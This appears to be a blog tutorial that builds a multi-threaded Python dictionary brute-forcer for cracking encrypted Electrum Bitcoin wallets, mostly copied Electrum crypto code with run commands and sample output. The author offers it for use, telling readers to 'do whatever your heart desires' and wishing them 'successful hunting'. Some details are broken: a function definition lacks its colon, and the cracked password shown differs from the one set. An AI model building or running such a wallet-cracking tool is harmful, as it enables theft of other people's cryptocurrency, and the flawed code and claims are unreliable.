Opening encrypted electrum wallets using brute force

Opening encrypted electrum wallets using brute force

WSWOLF

We will conduct a small study of Electrum Bitcoin Wallet (hereinafter EBW), namely:

My favorite: Let's code, parse the EBW source code;

Let's make a multi-threaded brute-force for opening Electrum wallets in Python3;

And, of course, we will test the whole thing.

 

If you have decided that this topic will be of interest to you, then let's get started. Make your favorite coffee and let's go ...


PS: I will be using OS Ubuntu 16.04, Python 3.7.1, Notepad ++ to develop our brute force.


1. Project creation

First, download Electrum-4.x.x.tar.gz (https://electrum.org/panel-download.html) python source and unpack (I will use version 4.1.2):

cd ~/Downloads && tar -xf Electrum-4.1.2.tar.gz && cd Electrum-4.x.x && ls -w1

and now we have

AUTHORS
contrib
electrum
electrum.desktop
Electrum.egg-info
LICENCE
MANIFEST.in
packages
PKG-INFO
README.rst
RELEASE-NOTES
run_electrum
setup.cfg
setup.py

For the project we only need the contents of the "electrum" directory. This directory contains all the python code we need that we will use to build our brute force.

Let's create a working directory:

mkdir ~/EBW_bf
mkdir ~/EBW_bf/src
cp -r ~/Downloads/Electrum-4.1.2/electrum ~/EBW_bf/
cd ~/EBW_bf

We will work in a virtual python environment, so in the directory with the project we will do the following:

python3 -m venv ./venv && source ./venv/bin/activate

PS: I am accessing python modules via -m, because it is more intuitive for me which version of python I am referring to.

Everything is ready, you can start writing code, or rather copy-paste from the Electrum sources. First, let's get acquainted with the wallet decryption process itself, I will designate it in the form of a diagram:

2. Coding

Let's start with main.py

Here we need the WalletStorage class, which will contain the decryption methods for our wallet. I will ignore the methods we do not need, because we will only focus on password verification. To understand how the initialization of the wallet in Electrum is organized, let's turn to electrum / storage.py, specifically, to the WalletStorage class. When verifying a password (key), Electrum initializes the WalletStorage class and calls the check_password () method from it, which calls the decrypt () method. So .. not very clear, as it seems to me. Let's write this construct in pseudocode for clarity:

init class WalletStorage('path_to_walet') --> check_password(password) --> decrypt(password)

I ended up with this beginning:

import hashlib
import sys
import os

from src import ecc

class WalletStorage(object):
 def __init__(self, path):
  
  self.path = os.path.join( os.path.dirname(os.path.realpath(__file__)), path)
  self._file_exists = bool(self.path and os.path.exists(self.path))
  self.pubkey = None
  self.decrypted = ''

  with open(self.path, "r", encoding='utf-8') as f:
   self.raw = f.read()

 def _get_encryption_magic(self):
  return b'BIE1'

 def decrypt(self, password) -> None:
  ec_key = self.get_eckey_from_password(password)
  
  s = False
  if self.raw:
   enc_magic = self._get_encryption_magic()
   s = ec_key.decrypt_message(self.raw, enc_magic)
  if s:
   print('[+] %s' % password)

 def check_password(self, password) -> None:
  self.decrypt(password)

 @staticmethod
 def get_eckey_from_password(password):
  secret = hashlib.pbkdf2_hmac('sha512', password.encode('utf-8'), b'', iterations=1024)
  ec_key = ecc.ECPrivkey.from_arbitrary_size_secret(secret)

  return ec_key

def main():

 # get wallet name for args
 wallet_name = None
 if len(sys.argv) != 2:
  print('Usage: %s <wallet_name>' % sys.argv[0])
  exit()
 else:
  wallet_name = sys.argv[1]
  if not os.path.exists(wallet_name):
   print('Wallet not found in current directory.')
   exit()

 # init wallet
 wallet = WalletStorage(wallet_name)

 for password in ['test1', 'passwordTest2']:
  wallet.check_password(password)

if __name__ == "__main__":
 main = main()

The decrypt method uses the following methods:

  get_eckey_from_password - getting the EC_KEY from the secret. The method returns an object of the ECPrivkey class, which we will refer to later.

  _get_encryption_magic - getting the encryption method (password, key, etc.). You can notice that I have shortened this method to return b'BIE1 ', since I will only be looking at the password encryption method. BIE1 - the first 4 characters of the wallet, which are responsible for the encryption method (do base64 decode if you don't trust)

 

The next step is to consider the methods of the ECPrivkey class, specifically, the decrypt_message method, which will give us the desired YES or NO when checking the password. Let's start in order: the first method we call is decrypt (password) -> get_eckey_from_password (password) which refers to the ecc.ECPrivkey.from_arbitrary_size_secret (secret) method


Let's create an ecc.py file in the src working directory, which will contain the ECPrivkey class:

PS: I follow the same naming conventions for the electrum project so that there is no confusion.

it should look like this:

electrum
venv
main.py
src
├── ecc.py
└── __init__.py

In __init__.py, let's denote our ecc.py

__init__.py

from . import ecc

Let's start generating ecc.py: at this stage we need the ECPubkey and ECPrivkey classes with the set of methods necessary for our purposes.

First of all, we call the static method of the class: ECPrivkey.from_arbitrary_size_secret (secret), let's see what happens there: refer to electrum / ecc.py


Again, everything is confusing ... let's write it in a readable form:

from_arbitrary_size_secret() --> init class ECPrivkey --> init class ECPubkey

Those. the static method from_arbitrary_size_secret initializes the ECPrivkey class, which in turn initializes the ECPubkey (GENERATOR) class when initialized.

Let's arrange everything:

ecc.py

from typing import Union, Tuple, Optional
from ctypes import (
 byref, c_byte, c_int, c_uint, c_char_p, c_size_t, c_void_p, create_string_buffer,
 CFUNCTYPE, POINTER, cast
)
import base64
import hashlib

from src.util import assert_bytes
from src.ecc_fast import _libsecp256k1, SECP256K1_EC_UNCOMPRESSED
from src.crypto import hmac_oneshot

def string_to_number(b: bytes) -> int:
 return int.from_bytes(b, byteorder='big', signed=False)

def is_secret_within_curve_range(secret: Union[int, bytes]) -> bool:
 if isinstance(secret, bytes):
  secret = string_to_number(secret)
 return 0 < secret < CURVE_ORDER

def _x_and_y_from_pubkey_bytes(pubkey: bytes) -> Tuple[int, int]:
 assert isinstance(pubkey, bytes), f'pubkey must be bytes, not {type(pubkey)}'
 
 pubkey_ptr = create_string_buffer(64)
 ret = _libsecp256k1.secp256k1_ec_pubkey_parse(
  _libsecp256k1.ctx, pubkey_ptr, pubkey, len(pubkey))
 if not ret:
  raise InvalidECPointException('public key could not be parsed or is invalid')

 pubkey_serialized = create_string_buffer(65)
 pubkey_size = c_size_t(65)
 _libsecp256k1.secp256k1_ec_pubkey_serialize(
  _libsecp256k1.ctx, pubkey_serialized, byref(pubkey_size), pubkey_ptr, SECP256K1_EC_UNCOMPRESSED)
 pubkey_serialized = bytes(pubkey_serialized)
 assert pubkey_serialized[0] == 0x04, pubkey_serialized
 x = int.from_bytes(pubkey_serialized[1:33], byteorder='big', signed=False)
 y = int.from_bytes(pubkey_serialized[33:65], byteorder='big', signed=False)
 return x, y

class ECPubkey(object):
 
 def __init__(self, b: Optional[bytes]):
  if b is not None:
   assert isinstance(b, (bytes, bytearray)), f'pubkey must be bytes-like, not {type(b)}'
   if isinstance(b, bytearray):
    b = bytes(b)
   self._x, self._y = _x_and_y_from_pubkey_bytes(b)
  else:
   self._x, self._y = None, None

 def is_at_infinity(self):
  return self == POINT_AT_INFINITY

 def x(self) -> int:
  return self._x

 def y(self) -> int:
  return self._y

 def get_public_key_bytes(self, compressed=True):
  if self.is_at_infinity(): raise Exception('point is at infinity')
  x = int.to_bytes(self.x(), length=32, byteorder='big', signed=False)
  y = int.to_bytes(self.y(), length=32, byteorder='big', signed=False)
  if compressed:
   header = b'\x03' if self.y() & 1 else b'\x02'
   return header + x
  else:
   header = b'\x04'
   return header + x + y

 def _to_libsecp256k1_pubkey_ptr(self):
  pubkey = create_string_buffer(64)
  public_pair_bytes = self.get_public_key_bytes(compressed=False)
  ret = _libsecp256k1.secp256k1_ec_pubkey_parse(
   _libsecp256k1.ctx, pubkey, public_pair_bytes, len(public_pair_bytes))
  if not ret:
   raise Exception('public key could not be parsed or is invalid')
  return pubkey

 @classmethod
 def _from_libsecp256k1_pubkey_ptr(cls, pubkey) -> 'ECPubkey':
  pubkey_serialized = create_string_buffer(65)
  pubkey_size = c_size_t(65)
  _libsecp256k1.secp256k1_ec_pubkey_serialize(
   _libsecp256k1.ctx, pubkey_serialized, byref(pubkey_size), pubkey, SECP256K1_EC_UNCOMPRESSED)
  return ECPubkey(bytes(pubkey_serialized))

 def __mul__(self, other: int):
  
  if not isinstance(other, int):
   raise TypeError('multiplication not defined for ECPubkey and {}'.format(type(other)))

  other %= CURVE_ORDER
  
  if self.is_at_infinity() or other == 0:
   return POINT_AT_INFINITY

  pubkey = self._to_libsecp256k1_pubkey_ptr()

  ret = _libsecp256k1.secp256k1_ec_pubkey_tweak_mul(_libsecp256k1.ctx, pubkey, other.to_bytes(32, byteorder="big"))
  
  if not ret:
   return POINT_AT_INFINITY

  return ECPubkey._from_libsecp256k1_pubkey_ptr(pubkey)

CURVE_ORDER = 0xFFFFFFFF_FFFFFFFF_FFFFFFFF_FFFFFFFE_BAAEDCE6_AF48A03B_BFD25E8C_D0364141
GENERATOR = ECPubkey(bytes.fromhex('0479be667ef9dcbbac55a06295ce870b07029bfcdb2dce28d959f2815b16f81798'
           '483ada7726a3c4655da4fbfc0e1108a8fd17b448a68554199c47d08ffb10d4b8'))
POINT_AT_INFINITY = ECPubkey(None)

class ECPrivkey(ECPubkey):
 def __init__(self, privkey_bytes: bytes):
  
  assert_bytes(privkey_bytes)
  if len(privkey_bytes) != 32:
   raise Exception('unexpected size for secret. should be 32 bytes, not {}'.format(len(privkey_bytes)))
 
  secret = string_to_number(privkey_bytes)

  if not is_secret_within_curve_range(secret):
   raise InvalidECPointException('Invalid secret scalar (not within curve order)')
  self.secret_scalar = secret

  pubkey = GENERATOR * secret

  super().__init__(pubkey.get_public_key_bytes(compressed=False))

 @classmethod
 def from_arbitrary_size_secret(cls, privkey_bytes: bytes):
  return ECPrivkey(cls.normalize_secret_bytes(privkey_bytes))

 @classmethod
 def normalize_secret_bytes(cls, privkey_bytes: bytes) -> bytes:
  scalar = string_to_number(privkey_bytes) % CURVE_ORDER
  if scalar == 0:
   raise Exception('invalid EC private key scalar: zero')
  privkey_32bytes = int.to_bytes(scalar, length=32, byteorder='big', signed=False)
  return privkey_32bytes

 def decrypt_message(self, encrypted: Union[str, bytes], magic: bytes=b'BIE1') -> bytes:
  
  encrypted = base64.b64decode(encrypted)
  if len(encrypted) < 85:
   return False
  
  magic_found = encrypted[:4]
  ephemeral_pubkey_bytes = encrypted[4:37]
  ciphertext = encrypted[37:-32]
  mac = encrypted[-32:]
  if magic_found != magic:
   return False
  try:
   ephemeral_pubkey = ECPubkey(ephemeral_pubkey_bytes)
  
  except InvalidECPointException as e:
   return False
  
  ecdh_key = (ephemeral_pubkey * self.secret_scalar).get_public_key_bytes(compressed=True)
  key = hashlib.sha512(ecdh_key).digest()
  iv, key_e, key_m = key[0:16], key[16:32], key[32:]

  if mac != hmac_oneshot(key_m, encrypted[:-32], hashlib.sha256):
   return False
  else:
   return True

Here we refer to:

   assert_bytes () from electrum / util.py

   _libsecp256k1, SECP256K1_EC_UNCOMPRESSED from electrum / ecc_fast.py (C library for ECDSA signatures and private / public key operations on the secp256k1 curve)

   hmac_oneshot () from electrum / crypto.py

Let's borrow them from the corresponding electrum / * py files:

create in the src directory: util.py, ecc_fast.py, crypto.py, respectively.

And now our __init__.py will look like this:

__init__.py

from . import ecc
from . import util
from . import ecc_fast
from . import crypto
Then I thought for you and left everything you need from a heap of unnecessary code:

ecc_fast.py

import os
import sys
import ctypes
from ctypes import (
    byref, c_byte, c_int, c_uint, c_char_p, c_size_t, c_void_p, create_string_buffer,
    CFUNCTYPE, POINTER, cast
)

SECP256K1_FLAGS_TYPE_MASK = ((1 << 8) - 1)
SECP256K1_FLAGS_TYPE_CONTEXT = (1 << 0)
SECP256K1_FLAGS_TYPE_COMPRESSION = (1 << 1)
# /** The higher bits contain the actual data. Do not use directly. */
SECP256K1_FLAGS_BIT_CONTEXT_VERIFY = (1 << 8)
SECP256K1_FLAGS_BIT_CONTEXT_SIGN = (1 << 9)
SECP256K1_FLAGS_BIT_COMPRESSION = (1 << 8)

# /** Flags to pass to secp256k1_context_create. */
SECP256K1_CONTEXT_VERIFY = (SECP256K1_FLAGS_TYPE_CONTEXT | SECP256K1_FLAGS_BIT_CONTEXT_VERIFY)
SECP256K1_CONTEXT_SIGN = (SECP256K1_FLAGS_TYPE_CONTEXT | SECP256K1_FLAGS_BIT_CONTEXT_SIGN)
SECP256K1_CONTEXT_NONE = (SECP256K1_FLAGS_TYPE_CONTEXT)

SECP256K1_EC_COMPRESSED = (SECP256K1_FLAGS_TYPE_COMPRESSION | SECP256K1_FLAGS_BIT_COMPRESSION)
SECP256K1_EC_UNCOMPRESSED = (SECP256K1_FLAGS_TYPE_COMPRESSION)


class LibModuleMissing(Exception): pass


def load_library()

    library_paths = ['/usr/lib/libsecp256k1.so.0']

    exceptions = []
    secp256k1 = None
    for libpath in library_paths:
        try:
            secp256k1 = ctypes.cdll.LoadLibrary(libpath)
        except BaseException as e:
            exceptions.append(e)
        else:
            break
    if not secp256k1:
        print(f'libsecp256k1 library failed to load. exceptions: {repr(exceptions)}')
        return None

    try:
        secp256k1.secp256k1_context_create.argtypes = [c_uint]
        secp256k1.secp256k1_context_create.restype = c_void_p

        secp256k1.secp256k1_context_randomize.argtypes = [c_void_p, c_char_p]
        secp256k1.secp256k1_context_randomize.restype = c_int

        secp256k1.secp256k1_ec_pubkey_create.argtypes = [c_void_p, c_void_p, c_char_p]
        secp256k1.secp256k1_ec_pubkey_create.restype = c_int

        secp256k1.secp256k1_ecdsa_sign.argtypes = [c_void_p, c_char_p, c_char_p, c_char_p, c_void_p, c_void_p]
        secp256k1.secp256k1_ecdsa_sign.restype = c_int

        secp256k1.secp256k1_ecdsa_verify.argtypes = [c_void_p, c_char_p, c_char_p, c_char_p]
        secp256k1.secp256k1_ecdsa_verify.restype = c_int

        secp256k1.secp256k1_ec_pubkey_parse.argtypes = [c_void_p, c_char_p, c_char_p, c_size_t]
        secp256k1.secp256k1_ec_pubkey_parse.restype = c_int

        secp256k1.secp256k1_ec_pubkey_serialize.argtypes = [c_void_p, c_char_p, c_void_p, c_char_p, c_uint]
        secp256k1.secp256k1_ec_pubkey_serialize.restype = c_int

        secp256k1.secp256k1_ecdsa_signature_parse_compact.argtypes = [c_void_p, c_char_p, c_char_p]
        secp256k1.secp256k1_ecdsa_signature_parse_compact.restype = c_int

        secp256k1.secp256k1_ecdsa_signature_normalize.argtypes = [c_void_p, c_char_p, c_char_p]
        secp256k1.secp256k1_ecdsa_signature_normalize.restype = c_int

        secp256k1.secp256k1_ecdsa_signature_serialize_compact.argtypes = [c_void_p, c_char_p, c_char_p]
        secp256k1.secp256k1_ecdsa_signature_serialize_compact.restype = c_int

        secp256k1.secp256k1_ecdsa_signature_parse_der.argtypes = [c_void_p, c_char_p, c_char_p, c_size_t]
        secp256k1.secp256k1_ecdsa_signature_parse_der.restype = c_int

        secp256k1.secp256k1_ecdsa_signature_serialize_der.argtypes = [c_void_p, c_char_p, c_void_p, c_char_p]
        secp256k1.secp256k1_ecdsa_signature_serialize_der.restype = c_int

        secp256k1.secp256k1_ec_pubkey_tweak_mul.argtypes = [c_void_p, c_char_p, c_char_p]
        secp256k1.secp256k1_ec_pubkey_tweak_mul.restype = c_int

        secp256k1.secp256k1_ec_pubkey_combine.argtypes = [c_void_p, c_char_p, c_void_p, c_size_t]
        secp256k1.secp256k1_ec_pubkey_combine.restype = c_int

        # --enable-module-recovery
        try:
            secp256k1.secp256k1_ecdsa_recover.argtypes = [c_void_p, c_char_p, c_char_p, c_char_p]
            secp256k1.secp256k1_ecdsa_recover.restype = c_int

            secp256k1.secp256k1_ecdsa_recoverable_signature_parse_compact.argtypes = [c_void_p, c_char_p, c_char_p, c_int]
            secp256k1.secp256k1_ecdsa_recoverable_signature_parse_compact.restype = c_int
        except (OSError, AttributeError):
            raise LibModuleMissing('libsecp256k1 library found but it was built '
                                   'without required module (--enable-module-recovery)')

        secp256k1.ctx = secp256k1.secp256k1_context_create(SECP256K1_CONTEXT_SIGN | SECP256K1_CONTEXT_VERIFY)
        ret = secp256k1.secp256k1_context_randomize(secp256k1.ctx, os.urandom(32))
        if not ret:
            print('secp256k1_context_randomize failed')
            return None

        return secp256k1
    except (OSError, AttributeError) as e:
        print(f'libsecp256k1 library was found and loaded but there was an error when using it: {repr(e)}')
        return None


_libsecp256k1 = None
try:
    _libsecp256k1 = load_library()
except BaseException as e:
    print(f'failed to load libsecp256k1: {repr(e)}')


if _libsecp256k1 is None:
    # hard fail:
    sys.exit(f"Error: Failed to load libsecp256k1.")

Make sure to change the path to libsecp256k1! It is presented as a list in the load_library () method

It is worth noting because I am writing a brute under Ubuntu, then I left the only way to detect libsecp256k1:

library_paths = ['/usr/lib/x86_64-linux-gnu/libsecp256k1.so.0']

PS: To find libsecp256k1.so.0 on your system, use the find utility:

find /usr/ -iname "libsecp256k1.so.0"

util.py

def assert_bytes(*args):
    """
    porting helper, assert args type
    """
    try:
        for x in args:
            assert isinstance(x, (bytes, bytearray))
    except:
        print('assert bytes failed', list(map(type, args)))
        raise

crypto.py

import hmac

from src.util import assert_bytes

def hmac_oneshot(key: bytes, msg: bytes, digest) -> bytes:
    if hasattr(hmac, 'digest'):
        # requires python 3.7+; faster
        return hmac.digest(key, msg, digest)
    else:
        return hmac.new(key, msg, digest).digest()

Ready! It remains to deal with the not yet very clear ecc.py

I will duplicate so that you do not scroll:

ecc.py

from typing import Union, Tuple, Optional
from ctypes import (
 byref, c_byte, c_int, c_uint, c_char_p, c_size_t, c_void_p, create_string_buffer,
 CFUNCTYPE, POINTER, cast
)
import base64
import hashlib

from src.util import assert_bytes
from src.ecc_fast import _libsecp256k1, SECP256K1_EC_UNCOMPRESSED
from src.crypto import hmac_oneshot

def string_to_number(b: bytes) -> int:
 return int.from_bytes(b, byteorder='big', signed=False)

def is_secret_within_curve_range(secret: Union[int, bytes]) -> bool:
 if isinstance(secret, bytes):
  secret = string_to_number(secret)
 return 0 < secret < CURVE_ORDER

def _x_and_y_from_pubkey_bytes(pubkey: bytes) -> Tuple[int, int]:
 assert isinstance(pubkey, bytes), f'pubkey must be bytes, not {type(pubkey)}'
 
 pubkey_ptr = create_string_buffer(64)
 ret = _libsecp256k1.secp256k1_ec_pubkey_parse(
  _libsecp256k1.ctx, pubkey_ptr, pubkey, len(pubkey))
 if not ret:
  raise InvalidECPointException('public key could not be parsed or is invalid')

 pubkey_serialized = create_string_buffer(65)
 pubkey_size = c_size_t(65)
 _libsecp256k1.secp256k1_ec_pubkey_serialize(
  _libsecp256k1.ctx, pubkey_serialized, byref(pubkey_size), pubkey_ptr, SECP256K1_EC_UNCOMPRESSED)
 pubkey_serialized = bytes(pubkey_serialized)
 assert pubkey_serialized[0] == 0x04, pubkey_serialized
 x = int.from_bytes(pubkey_serialized[1:33], byteorder='big', signed=False)
 y = int.from_bytes(pubkey_serialized[33:65], byteorder='big', signed=False)
 return x, y

class ECPubkey(object):
 
 def __init__(self, b: Optional[bytes]):
  if b is not None:
   assert isinstance(b, (bytes, bytearray)), f'pubkey must be bytes-like, not {type(b)}'
   if isinstance(b, bytearray):
    b = bytes(b)
   self._x, self._y = _x_and_y_from_pubkey_bytes(b)
  else:
   self._x, self._y = None, None

 def is_at_infinity(self):
  return self == POINT_AT_INFINITY

 def x(self) -> int:
  return self._x

 def y(self) -> int:
  return self._y

 def get_public_key_bytes(self, compressed=True):
  if self.is_at_infinity(): raise Exception('point is at infinity')
  x = int.to_bytes(self.x(), length=32, byteorder='big', signed=False)
  y = int.to_bytes(self.y(), length=32, byteorder='big', signed=False)
  if compressed:
   header = b'\x03' if self.y() & 1 else b'\x02'
   return header + x
  else:
   header = b'\x04'
   return header + x + y

 def _to_libsecp256k1_pubkey_ptr(self):
  pubkey = create_string_buffer(64)
  public_pair_bytes = self.get_public_key_bytes(compressed=False)
  ret = _libsecp256k1.secp256k1_ec_pubkey_parse(
   _libsecp256k1.ctx, pubkey, public_pair_bytes, len(public_pair_bytes))
  if not ret:
   raise Exception('public key could not be parsed or is invalid')
  return pubkey

 @classmethod
 def _from_libsecp256k1_pubkey_ptr(cls, pubkey) -> 'ECPubkey':
  pubkey_serialized = create_string_buffer(65)
  pubkey_size = c_size_t(65)
  _libsecp256k1.secp256k1_ec_pubkey_serialize(
   _libsecp256k1.ctx, pubkey_serialized, byref(pubkey_size), pubkey, SECP256K1_EC_UNCOMPRESSED)
  return ECPubkey(bytes(pubkey_serialized))

 def __mul__(self, other: int):
  
  if not isinstance(other, int):
   raise TypeError('multiplication not defined for ECPubkey and {}'.format(type(other)))

  other %= CURVE_ORDER
  
  if self.is_at_infinity() or other == 0:
   return POINT_AT_INFINITY

  pubkey = self._to_libsecp256k1_pubkey_ptr()

  ret = _libsecp256k1.secp256k1_ec_pubkey_tweak_mul(_libsecp256k1.ctx, pubkey, other.to_bytes(32, byteorder="big"))
  
  if not ret:
   return POINT_AT_INFINITY

  return ECPubkey._from_libsecp256k1_pubkey_ptr(pubkey)

CURVE_ORDER = 0xFFFFFFFF_FFFFFFFF_FFFFFFFF_FFFFFFFE_BAAEDCE6_AF48A03B_BFD25E8C_D0364141
GENERATOR = ECPubkey(bytes.fromhex('0479be667ef9dcbbac55a06295ce870b07029bfcdb2dce28d959f2815b16f81798'
           '483ada7726a3c4655da4fbfc0e1108a8fd17b448a68554199c47d08ffb10d4b8'))
POINT_AT_INFINITY = ECPubkey(None)

class ECPrivkey(ECPubkey):
 def __init__(self, privkey_bytes: bytes):
  
  assert_bytes(privkey_bytes)
  if len(privkey_bytes) != 32:
   raise Exception('unexpected size for secret. should be 32 bytes, not {}'.format(len(privkey_bytes)))
 
  secret = string_to_number(privkey_bytes)

  if not is_secret_within_curve_range(secret):
   raise InvalidECPointException('Invalid secret scalar (not within curve order)')
  self.secret_scalar = secret

  pubkey = GENERATOR * secret

  super().__init__(pubkey.get_public_key_bytes(compressed=False))

 @classmethod
 def from_arbitrary_size_secret(cls, privkey_bytes: bytes):
  return ECPrivkey(cls.normalize_secret_bytes(privkey_bytes))

 @classmethod
 def normalize_secret_bytes(cls, privkey_bytes: bytes) -> bytes:
  scalar = string_to_number(privkey_bytes) % CURVE_ORDER
  if scalar == 0:
   raise Exception('invalid EC private key scalar: zero')
  privkey_32bytes = int.to_bytes(scalar, length=32, byteorder='big', signed=False)
  return privkey_32bytes

 def decrypt_message(self, encrypted: Union[str, bytes], magic: bytes=b'BIE1') -> bytes:

  encrypted = base64.b64decode(encrypted)
  if len(encrypted) < 85:
   return False
  
  magic_found = encrypted[:4]
  ephemeral_pubkey_bytes = encrypted[4:37]
  ciphertext = encrypted[37:-32]
  mac = encrypted[-32:]
  if magic_found != magic:
   return False
  try:
   ephemeral_pubkey = ECPubkey(ephemeral_pubkey_bytes)
  except:
   return False
  
  ecdh_key = (ephemeral_pubkey * self.secret_scalar).get_public_key_bytes(compressed=True)
  key = hashlib.sha512(ecdh_key).digest()
  iv, key_e, key_m = key[0:16], key[16:32], key[32:]

  if mac != hmac_oneshot(key_m, encrypted[:-32], hashlib.sha256):
   return False
  else:
   return True

Public key creation dates back to

pubkey = GENERATOR * secret


The GENERATOR variable is ECPubkey (bytes.fromhex ('...')). those. a prototype of the ECPubkey class. To multiply an ECPubkey by an int, you need to consider the presence of the __mul__ (multiplication) method in the ECPubkey class.


Now let's take a look at the long-awaited decrypt_message () method, which is called in main.py and should return the result to us. It's worth noting at this point that we have already initialized the ECPubkey and ECPrivkey classes earlier (keep that in mind)

def decrypt_message(self, encrypted: Union[str, bytes], magic: bytes=b'BIE1') -> bytes:
  
  encrypted = base64.b64decode(encrypted)
  if len(encrypted) < 85:
   return False
  
  magic_found = encrypted[:4]
  ephemeral_pubkey_bytes = encrypted[4:37]
  ciphertext = encrypted[37:-32]
  mac = encrypted[-32:]
  if magic_found != magic:
   return False
  
  try:
   ephemeral_pubkey = ECPubkey(ephemeral_pubkey_bytes)
  except:
   return False
  
  ecdh_key = (ephemeral_pubkey * self.secret_scalar).get_public_key_bytes(compressed=True)
  key = hashlib.sha512(ecdh_key).digest()
  iv, key_e, key_m = key[0:16], key[16:32], key[32:]

  # here we will only leave return False if the password does not match the desired one and return False otherwise.
  if mac != hmac_oneshot(key_m, encrypted[:-32], hashlib.sha256):
   return False
  else:
   return True

Here we see how our wallet is torn to pieces, followed by magic calculations based on ephemeral_pubkey (temporary public key) and finally, if mac is not equal to hmac_oneshot (key_m, encrypted [: - 32], hashlib.sha256) then "the next password is pseudo ". Well, here we are almost at the finish line, it remains to wrap the whole thing in multithreading and test it.


To achieve multithreading, we will use ThreadExecutorPool (as anyone, but I'm just used to working with it). In order not to overload the already occupied memory, we will read the file with passwords line by line, and not load all of them into memory.


Here's what I suggest:

que = []
with open(file_with_password, 'r', errors='replace') as fd:
 for password in fd:
  password = password.rstrip()
  que.append(password)

  if len(que) == 1000:
   with ThreadPoolExecutor(max_workers=4) as pool:
      pool.map(worker, que)
  que = []

if len(que) > 0:
 with ThreadPoolExecutor(max_workers=4) as pool:
  pool.map(worker, que)

Let's add a progress bar by installing a convenient tqdm package:

python3 -m pip install tqdm

It is worth noting here that before starting to brute force passwords, we will have to find out the total number of passwords in the dictionary in order to display the progress.

As a result, we get something like this:

main.py

from concurrent.futures import ThreadPoolExecutor
from tqdm import tqdm
import hashlib
import sys
import os

from src import ecc

class WalletStorage(object):
 def __init__(self, path):
  
  self.path = os.path.join( os.path.dirname(os.path.realpath(__file__)), path)
  self._file_exists = bool(self.path and os.path.exists(self.path))
  self.pubkey = None
  self.decrypted = ''

  with open(self.path, "r", encoding='utf-8') as f:
   self.raw = f.read()

 def _get_encryption_magic(self):
  return b'BIE1'

 def decrypt(self, password) -> None:
  ec_key = self.get_eckey_from_password(password)
  
  s = False
  if self.raw:
   enc_magic = self._get_encryption_magic()
   s = ec_key.decrypt_message(self.raw, enc_magic)
  if s:
   print()
   print('[+] %s' % password)
   exit()

 def check_password(self, password) -> None:
  global PBAR
  
  self.decrypt(password)
  PBAR.update(1)

 @staticmethod
 def get_eckey_from_password(password):
  secret = hashlib.pbkdf2_hmac('sha512', password.encode('utf-8'), b'', iterations=1024)
  ec_key = ecc.ECPrivkey.from_arbitrary_size_secret(secret)

  return ec_key

def main():

 global PBAR 

 # get wallet name for args
 wallet_name = None
 if len(sys.argv) != 2:
  print('Usage: %s <wallet_name>' % sys.argv[0])
  exit()
 else:
  wallet_name = sys.argv[1]
  if not os.path.exists(wallet_name):
   print('Wallet not found in current directory.')
   exit()

 # init wallet
 wallet = WalletStorage(wallet_name)

 print('loading dict ...')
 dict_len = 0
 with open('rockyou.txt', 'r', errors='replace') as fd:
  for line in fd:
   dict_len += 1

 print('starting...')
 print()
 
 PBAR = tqdm(total=dict_len)

 que = []
 with open('rockyou.txt', 'r', errors='replace') as fd:
  for password in fd:
   password = password.rstrip()
   que.append(password)

   if len(que) == 1000:
    with ThreadPoolExecutor(max_workers=4) as pool:
      pool.map(wallet.check_password, que)
    que = []

 if len(que) > 0:
  with ThreadPoolExecutor(max_workers=4) as pool:
   pool.map(wallet.check_password, que)

if __name__ == "__main__":
 main = main()

and this

venv
electrum
rockyou.txt
main.py
src
├── crypto.py
├── ecc_fast.py
├── ecc.py
├── __init__.py
└── util.py

3 Testing!

We will use the well-known rockyou as a dictionary.

Let's create a wallet with a simple password (mine is password123), copy it to the working directory and start testing.

PS: set the password that is in the dictionary for testing. Our task is to make sure that the script is working correctly, and then do whatever your heart desires.

cp ~/.electrum/wallets/test_wallet ~/EBW_bf
python3 main.py test_wallet

The PC is noisy, and we just wait:)

loading dict ...
starting...

 38%|█████████▉                | 5491654/14344324 [6489.81it/s]
[+] testpassword123

PwN! The result was not long in coming. I hope in this article you have emphasized something for yourself and will use the knowledge gained in the future (of course for good purposes). Successful hunting everyone!

if you have the opportunity to use azure quantum, then the speed of work on those pc is 500-1000 times faster than usual.

Report Page